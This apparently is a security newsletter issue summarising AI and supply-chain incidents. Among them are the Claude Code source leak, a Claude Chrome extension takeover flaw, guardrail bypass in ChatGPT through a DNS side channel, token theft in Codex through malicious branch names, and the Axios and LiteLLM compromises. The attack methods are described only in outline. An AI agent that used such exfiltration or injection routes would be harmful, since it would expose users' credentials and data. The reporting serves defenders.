Tech Risk #164: Anthropic source code leak
Plus, Claude Chrome extension’s flaw, managing the security debt of AI outputs, securing the future of agentic AI, supply chain attacks, and more!
Tech Risk Reading Picks
Anthropic source code leak: Anthropic recently inadvertantly published the internal source code for Claude Code due to a packaging error on the NPM registry. A 60 MB source map file allowed the reconstruction of nearly 500,000 lines of code across 1,900 files. While no customer data or credentials were compromised, the leak exposed proprietary features like Proactive and Dream modes. Simultaneously, Anthropic is investigating a separate high priority bug causing users to exhaust their message limits prematurely. The company is currently issuing DMCA notices to remove the leaked code and working to resolve the usage limit issues. [more]
Claude Chrome extension’s flaw: A critical security flaw discovered in the Claude Chrome extension allowed attackers to gain full control over user accounts without any direct interaction. By visiting a malicious website, users could have their session tokens stolen, emails sent, and private chat histories exported. The vulnerability stemmed from an overly broad trust policy combined with a bug in a third-party CAPTCHA component. Anthropic and Arkose Labs patched the issue in February 2026. This incident highlights the significant risks associated with granting AI assistants broad permissions to act as autonomous agents within a web browser. [more]
Managing the security debt of AI outputs: Modern businesses increasingly rely on open-source components for operational efficiency, yet this reliance has created a substantial "security debt" characterized by fragmented vulnerability data and complex supply chain risks. Public databases often fail to provide timely or accurate severity scores for open-source flaws, leading to a dangerous gap between the discovery of a vulnerability and the availability of actionable intelligence. This problem is exacerbated by the presence of unmaintained "legacy" code and the rapid rise of malicious packages within popular registries. While AI agents are being integrated to accelerate development, they could introduce further risk by recommending obsolete or hallucinated libraries and generating code with systemic security flaws. Consequently, organizations must evolve beyond traditional patch management to implement more rigorous download policies, software build protections, and specialized oversight for AI-driven development. [more]
Google AI agents can be weaponized by an attacker: Cybersecurity researchers have identified a significant security flaw within Google Cloud’s Vertex AI platform involving excessive default permissions. This "blind spot" allows attackers to weaponize AI agents to bypass isolation boundaries and access sensitive data across an organization's cloud environment. By exploiting the default service agent's broad access, an attacker can extract credentials to steal proprietary data from cloud storage or map internal infrastructure. Google has responded by updating documentation and recommending that organizations manually configure service accounts to restrict access. Failure to address these default settings transforms a functional AI tool into a sophisticated insider threat capable of compromising entire project ecosystems. [more]
Securing the future of agentic AI: The emergence of agentic AI introduces a shift from simple “bad output” to complex “bad outcomes,” where autonomous systems can misinterpret instructions or misuse enterprise identities across workflows. To address these evolving threats, Microsoft has aligned its Copilot Studio and Agent 365 platforms with the 2026 OWASP Top 10 for Agentic Applications. This framework identifies critical risks such as goal hijacking and cascading failures that occur when agents act with broad permissions or lack clear behavioral boundaries. By treating agents as managed, auditable applications rather than autonomous black boxes, organizations can implement real-time protections and predefined connectors to constrain behavior. This strategic approach ensures that high-value business automation remains governable, observable, and secure against sophisticated adversarial manipulation. [more]
Addressing hidden vulnerabilities in enterprise AI environments: Security researchers recently identified critical vulnerabilities in OpenAI’s ChatGPT and Codex platforms that allowed for the silent exfiltration of sensitive data and credentials. One flaw exploited a DNS-based side channel within the AI’s Linux runtime to bypass standard guardrails, enabling attackers to leak conversation logs and files without triggering user warnings. A separate command injection vulnerability in the Codex engineering agent permitted the theft of GitHub authentication tokens through manipulated branch names. While OpenAI has patched these specific issues, the findings reveal a significant security blind spot where AI systems operate under the false assumption of environment isolation. These incidents highlight that native AI safeguards are currently insufficient for protecting high-value enterprise intellectual property and sensitive data.
Unauthorized Github token exfiltration: OpenAI recently patched a critical command injection vulnerability in its Codex AI coding assistant that allowed attackers to steal sensitive GitHub User Access Tokens. The flaw originated from improper input sanitization of GitHub branch names, which the system failed to validate before executing commands within its cloud-hosted containers. By crafting a malicious branch name containing hidden shell commands, an attacker could trigger unauthorized code execution whenever a developer interacted with a compromised repository. This exploit enabled the silent extraction of authentication tokens, potentially granting attackers broad access to private source code and organizational resources across the GitHub environment. [more]
“ModelSpy" attack system to hijack AI model structures from distance: A research team from KAIST, the National University of Singapore, and Zhejiang University has identified a critical security vulnerability that allows for the remote theft of artificial intelligence model architectures. Using a system called ModelSpy, attackers can capture electromagnetic signals emitted by GPUs during AI computations from up to six meters away, even through walls. This side-channel attack achieves up to 97.6% accuracy in reconstructing deep learning layer configurations without needing direct server access or malware. To mitigate this risk, researchers recommend implementing electromagnetic interference and computational obfuscation as part of a comprehensive cyber-physical security strategy. [more]
AI exploits FreeBSD kernel: A recent security milestone demonstrated that a frontier AI model autonomously discovered and weaponized a critical vulnerability in the FreeBSD operating system, a platform renowned for its high security and used by major enterprises like Netflix and WhatsApp. Moving beyond simple bug detection, the AI agent engineered a sophisticated, multi-stage exploit in just four hours of compute time, achieving root-level access that typically requires weeks of specialized human labor. This shift marks the transition from AI as a supportive tool to an autonomous actor capable of conducting high-level offensive operations. As the cost and time required to develop “zero-day” style exploits collapse, the traditional security advantage held by mature codebases is eroding, necessitating a radical acceleration in defensive response and patching cycles. [more]
Critical vulnerability in the Langflow framework: The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning regarding a critical vulnerability (CVE-2026-33017) in the Langflow framework, which is widely used for developing AI agents. This flaw allows unauthorized remote code execution, enabling attackers to gain control over systems by sending a single malicious web request. Hackers began exploiting the weakness within 20 hours of its public disclosure, highlighting the speed at which modern threats materialize. Federal agencies must patch their systems by April 8, but all organizations using Langflow are advised to upgrade to version 1.9.0 or higher immediately. Failure to address this issue could lead to the theft of sensitive data, including database credentials and cloud secrets stored within AI development environments. [more]
Supply chain attacks
Attack on open-source project LiteLLM: The AI recruiting startup Mercor recently confirmed a security incident resulting from a supply chain attack targeting the open-source project LiteLLM. As a critical partner for major AI firms like OpenAI, Mercor was impacted when malicious code was distributed through compromised PyPI package publishes. While Mercor has engaged forensic experts to contain the breach, the hacking group Lapsus$ claims to have exfiltrated hundreds of gigabytes of corporate data. A clean version of the affected software has since been released, but investigations into the full extent of the data exposure are ongoing. [more]
Attack on Axios: North Korean threat actors executed a premeditated supply chain attack by hijacking the npm account of the primary maintainer for Axios, a library used by millions of developers. The attackers bypassed secure GitHub Actions workflows by compromising the maintainer’s account, changing the associated email, and utilizing a long-lived access token to publish malicious versions via the npm command line interface. This breach resulted in the distribution of versions 1.14.1 and 0.30.4, which contained a remote access trojan hidden within a sub-dependency. The malware targeted Windows, macOS, and Linux systems by executing automatically during the package installation process. Security teams removed the poisoned updates within hours, but the incident demonstrates the extreme vulnerability of automated build pipelines to compromised third-party credentials. [more]

